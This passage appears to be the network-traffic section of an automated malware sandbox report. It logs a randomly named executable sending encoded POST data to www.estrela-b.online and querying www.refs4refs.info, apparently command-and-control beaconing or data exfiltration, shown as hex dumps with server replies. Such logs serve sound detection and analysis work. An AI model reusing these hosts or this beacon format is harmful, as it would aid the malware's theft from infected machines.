                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 70 6d 76 55 72 42 68 30 6e 75 37 42 57 75 65 57 7a 51 72 2f 77 6d 35 6e 50 63 4e 66 4a 7a 42 75 54 37 5a 67 68 2f 64 42 2f 70 4e 67 45 4a 5a 4d 48 47 66 63 6a 57 37 64 2f 59 78 6f 73 59 65 65 44 71 4d 6c 74 44 61 69 30 76 38 53 62 59 34 6c 79 75 38 6e 4b 68 4b 74 78 65 69 44 55 79 30 38 52 2f 45 72 73 74 4f 30 72 6c 6b 61 7a 77 4a 78 50 6c 4a 5a 59 41 57 37 70 6f 4b 35 57 65 7a 76 44 56 34 66 52 4c 4d 59 4e 45 70 39 55 30 76 41 51 56 58 4b 62 7a 6f 34 77 54 78 78 4c 36 70 77 4a 52 54 55 51 48 43 66 76 61 4a 46 46 6b 45 52 61 36 2b 30 4f 35 69 31 67 5a 44 62 75 58 65 57 68 2f 46 34 43 33 43 58 77 44 74 49 59 54 52 64 54 73 63 49 74 6e 77 46 6f 51 35 65 59 54 74 2f 2b 6a 48 4a 4f 35 35 5a 48 54 4b 46 58 6e 64 64 65 64 65 57 49 72 54 34 37 42 2f 53 6a 30 64 62 53 51 66 53 6f 73 73 57 57 61 67 72 6c 47 50 30 31 36 66 59 37 6d 51 73 6b 49 59 79 5a 67 41 76 53 34 78 63 30 30 36 50 4d 38 69 53 30 37 58 61 2f 36 52 42 57 71 50 30 6c 73 4c 39 49 50 38 62 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzBuT7Zgh/dB/pNgEJZMHGfcjW7d/YxosYeeDqMltDai0v8SbY4lyu8nKhKtxeiDUy08R/ErstO0rlkazwJxPlJZYAW7poK5WezvDV4fRLMYNEp9U0vAQVXKbzo4wTxxL6pwJRTUQHCfvaJFFkERa6+0O5i1gZDbuXeWh/F4C3CXwDtIYTRdTscItnwFoQ5eYTt/+jHJO55ZHTKFXnddedeWIrT47B/Sj0dbSQfSossWWagrlGP016fY7mQskIYyZgAvS4xc006PM8iS07Xa/6RBWqP0lsL9IP8bocx+13YANu2NTtovZeueVJNzqiDbgMuxdI0VWbn63GaPVcUaT7IuL5Rb9dygAHZ9pIm869aIkjG4yim5meXPohz6M6TTK506uMUtDgb4RvN9HE+LDKT/u5WxR09w4JM5EbNmkoB2NRrhR+Cvi0XsUFAF0LLuRzmhW2iOynDB8NPVTZBt6mBeW3KpgGYUEQRPaqeVNNQoaPB4X6/ed0356vXGKVwDzlbZjUAaerFX8Eyg+w7c5pUdtrDfRZrBifTrgzGK+8xCW3T/H3OIm81lyB56rQuaLIOzBUqSrsfITAfyi/UkdQsBD2eeZYU9dLphfaNSH46qT9+OzZy91P/fnvPI7FpOglsdC3ll4LNWihS7Kih8OldyeP71Uu87UzzMMyBCJz8o3UVNE2G66wyQVeiISgwswGsA4aH/l2TJqIrA6sagI1PdP0NeelGBky8HmFXW4jnAJxo37d5ujyzPcx35wNjAv2ds5BfWRKg7CWhuZu2Wqd/A9O+6HUm5ktzCI61RGvSixORUn9s6HU6JnkUCNqXDecL8rZjXhASSQNgH7z8dlgy8Wx5KHvXepRDQI0q5AA31BheOenJ9W6eRMYpDwgWITDOKFURH3vsaWWFl1cFW40fJQXf3eYOb1PmqZtH6L4tOmh9Xt49iQFEBmLvogu8HsivAjq [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000549078 CEST2824OUTData Raw: 4e 77 58 54 37 42 32 32 64 51 69 50 43 72 4d 65 49 73 46 71 4d 7a 45 50 47 5a 57 4c 69 38 45 7a 44 42 78 55 79 37 4a 71 6d 30 36 5a 62 4f 75 47 4e 6d 57 57 6c 73 4b 71 42 44 59 74 75 69 42 34 4e 66 56 35 35 35 72 46 41 32 63 41 75 41 7a 33 53 33
                                                                                                                                                                                                                        Data Ascii: NwXT7B22dQiPCrMeIsFqMzEPGZWLi8EzDBxUy7Jqm06ZbOuGNmWWlsKqBDYtuiB4NfV555rFA2cAuAz3S3olzR9cSROd7dTT8il+4NeGSVfqyr171znNXQS6gDpPwtoripsZWri+LHfzL+yeib2ZaCvW7c+C9BH0ufptAerp+Bstr9LkocKFl/kb2wTjDK/8wg+uRwydSW73ZL3E23ezBA/c4izlgNI54ttxEPzcSzthSzV7mDq


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        12192.168.11.20498043.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.638305902 CEST536OUTGET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741117954 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 36 73 55 65 41 45 74 37 68 77 59 34 6d 6b 33 77 70 6b 31 50 79 2b 4b 64 64 71 54 58 79 41 32 7a 38 31 68 48 42 62 4d 44 57 68 78 68 62 34 70 50 32 50 30 47 78 2f 45 79 49 35 46 4f 43 45 58 4a 67 6c 62 48 7a 70 74 63 74 62 36 6d 47 35 6b 52 6b 6a 47 4f 79 5a 30 72 43 4b 42 6c 38 4f 42 6e 64 6a 75 69 79 38 72 56 47 45 51 72 57 6f 67 79 76 4f 65 31 77 6c 49 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        13192.168.11.2049805162.241.63.77805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.046096087 CEST817OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6b 6c 39 5a 71 49 7a 6b 35 55 49 59 4b 49 53 68 5a 75 7a 7a 65 52 6f 79 64 55 67 53 31 53 4b 45 78 2b 46 52 6b 52 70 77 67 50 39 46 43 58 72 75 68 49 4e 47 46 32 6b 4f 66 65 75 44 73 38 6f 63 52 64 2b 47 51 56 75 41 51 5a 4b 6a 75 2f 52 63 49 58 65 41 54 6e 49 68 39 64 52 6e 34 4a 51 47 61 32 75 75 77 59 30 6d 44 6b 52 42 70 6a 44 6a 2b 66 72 37 49 54 78 45 44 46 35 6f 47 65 50 65 41 52 77 57 44 75 32 4d 53 30 38 58 77 37 73 39 6b 5a 71 58 41 58 5a 56 73 75 42 6d 36 6c 2f 6f 52 36 77 44 65 77 4d 6d 53 6e 48 6a 65 6a 6b 43 77 74 59 5a 39 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1Skkl9ZqIzk5UIYKIShZuzzeRoydUgS1SKEx+FRkRpwgP9FCXruhINGF2kOfeuDs8ocRd+GQVuAQZKju/RcIXeATnIh9dRn4JQGa2uuwY0mDkRBpjDj+fr7ITxEDF5oGePeARwWDu2MS08Xw7s9kZqXAXZVsuBm6l/oR6wDewMmSnHjejkCwtYZ9w==
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.266845942 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:23 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.266864061 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        14192.168.11.2049806162.241.63.77805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.701554060 CEST837OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6d 45 4e 5a 6f 72 72 6b 75 45 49 62 41 6f 53 68 58 4f 7a 33 65 52 6b 79 64 56 55 38 31 68 69 45 78 61 4a 52 6a 51 70 77 68 50 39 46 61 6e 71 6b 75 6f 4e 64 46 32 70 7a 66 61 75 44 73 38 38 63 52 66 32 47 58 6d 47 44 66 70 4b 62 31 76 52 53 47 33 65 41 54 6e 49 68 39 63 78 42 34 4a 49 47 47 58 65 75 2f 5a 30 6c 4f 45 52 65 68 44 44 6a 73 76 72 33 49 54 77 2b 44 47 39 4f 47 59 4c 65 41 51 41 57 41 38 65 50 59 30 38 52 30 37 74 68 6c 34 50 42 41 55 74 5a 6c 35 6b 2f 39 33 6a 53 55 73 39 5a 44 43 34 43 52 30 62 52 61 54 64 71 79 76 5a 43 67 37 43 52 51 71 6e 49 5a 78 65 78 71 58 64 31 4f 48 47 32 51 66 41 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81hiExaJRjQpwhP9FanqkuoNdF2pzfauDs88cRf2GXmGDfpKb1vRSG3eATnIh9cxB4JIGGXeu/Z0lOERehDDjsvr3ITw+DG9OGYLeAQAWA8ePY08R07thl4PBAUtZl5k/93jSUs9ZDC4CR0bRaTdqyvZCg7CRQqnIZxexqXd1OHG2QfA=
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.913273096 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:25 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.913285971 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        15192.168.11.2049807162.241.63.77805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359085083 CEST1289OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6d 45 4e 5a 6f 72 72 6b 75 45 49 62 41 6f 53 68 58 4f 7a 33 65 52 6b 79 64 56 55 38 31 6e 36 45 77 70 42 52 6c 7a 52 77 69 50 39 46 58 48 71 6e 75 6f 4d 50 46 32 78 2f 66 61 72 30 73 2f 45 63 51 36 36 47 53 58 47 44 45 35 4b 62 71 2f 52 66 49 58 66 41 54 6e 59 74 39 64 64 42 34 4a 49 47 47 55 32 75 34 49 30 6c 49 45 52 42 70 6a 44 2f 2b 66 71 6f 49 58 63 45 44 48 4a 34 47 6f 72 65 41 77 51 57 51 5a 71 50 55 30 38 54 7a 37 74 70 6c 34 79 66 41 55 67 67 6c 35 35 55 39 30 44 53 59 70 63 34 54 69 78 56 48 45 44 36 47 44 42 48 77 75 39 78 67 4c 4f 61 55 4b 6e 78 66 52 47 54 73 6b 6c 54 64 56 72 38 44 66 79 6b 6b 68 65 79 74 76 52 67 49 33 43 30 72 44 68 38 45 57 76 6d 73 4d 4c 72 39 4e 6e 2b 51 62 4e 55 37 43 78 73 5a 64 52 57 53 6e 46 6a 4c 75 65 42 42 47 4e 4d 6c 6d 4c 67 2f 46 73 58 62 2b 76 70 35 5a 6d 4c 6b 49 2b 78 62 78 43 62 4f 72 57 58 45 44 64 57 6a 51 46 34 32 55 6e 78 6d 31 59 6e 4f 72 70 33 63 2f 53 2f 67 32 2b 75 47 44 31 4c 62 68 52 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81n6EwpBRlzRwiP9FXHqnuoMPF2x/far0s/EcQ66GSXGDE5Kbq/RfIXfATnYt9ddB4JIGGU2u4I0lIERBpjD/+fqoIXcEDHJ4GoreAwQWQZqPU08Tz7tpl4yfAUggl55U90DSYpc4TixVHED6GDBHwu9xgLOaUKnxfRGTsklTdVr8DfykkheytvRgI3C0rDh8EWvmsMLr9Nn+QbNU7CxsZdRWSnFjLueBBGNMlmLg/FsXb+vp5ZmLkI+xbxCbOrWXEDdWjQF42Unxm1YnOrp3c/S/g2+uGD1LbhRmdQtzZFVedwYkPW8LtaRu8XTlR9bY+9P/nn161DKJsK7tlY9lG67NgBGiGvXXSJsnV+LzdXA6msoNhqHrqFdsQCCQbtlr3/IJdUYHhMnFVlYbe6sg8PAxABL0rlUNMffH67S8bHfqA6m3ov9/G/swz/oOs+PALGBvaYuySO/+hmRtKgFEhv7w/K7iAyISIU8exRO8aUeZ68+47VIl/n0icj0Q1CcjaS4lItXsIuPI77z6kvZc4pECgXE30RE8loAqZYes1PR5Y33kUQZSbhvdcsMMT/sSCW835KewtMmWm6XM7kdfQCPneL2VWj+Aa26W4NeuRIHCwIbiJkv
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359146118 CEST5156OUTData Raw: 69 2b 33 38 68 57 62 75 6d 6c 73 38 4e 51 59 49 2b 30 6f 43 4a 42 61 7a 57 4b 52 51 59 55 41 77 32 66 5a 54 66 41 6f 6d 52 59 5a 67 42 4e 47 51 34 73 62 78 43 4d 67 68 41 50 34 7a 2b 42 4b 46 54 78 73 47 47 6d 64 35 48 6f 52 64 79 4a 6a 77 39 77
                                                                                                                                                                                                                        Data Ascii: i+38hWbumls8NQYI+0oCJBazWKRQYUAw2fZTfAomRYZgBNGQ4sbxCMghAP4z+BKFTxsGGmd5HoRdyJjw9wtfCf7fgMJoZ+eggNhk7BOmbFalw4DgEkkMBK46R2lrvX6zLcmkqzcYyiYjVIEaqsk54ombiSsnxCEsrGIFYRbSiWFpyh4r/MuohXUQboaumZrvfF1QoxKoMXzn4AzsOMDLf1AFeTG/yOikbjtpa7Lf5sQVyEaUVWs
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359201908 CEST1541OUTData Raw: 49 34 41 63 54 6d 4a 52 35 65 7a 57 75 48 47 30 2f 75 38 57 2f 4a 64 69 4b 6c 2f 72 49 4c 49 6d 69 75 65 4c 43 46 69 36 52 43 7a 48 63 74 73 30 63 39 39 78 6e 44 49 52 2b 71 78 44 48 75 31 6a 44 6a 4c 71 35 4a 39 39 46 79 42 5a 55 55 44 73 74 4e
                                                                                                                                                                                                                        Data Ascii: I4AcTmJR5ezWuHG0/u8W/JdiKl/rILImiueLCFi6RCzHcts0c99xnDIR+qxDHu1jDjLq5J99FyBZUUDstN3fcFq9QvHW1iFMjSO8es/f9As/5FerU88dK5tCtIman9KOQ8mgbieEYgB/JQd043RrD6KfJO6O/rmz8iLeDjzASYwC5SiGWd5QVgtoNsMhQsVV6F4EPEe/r7njWFFGv2zjIbMs9TOK63GIEQNNNJ5lxqQOeCFJmqQ
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.584069967 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:28 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
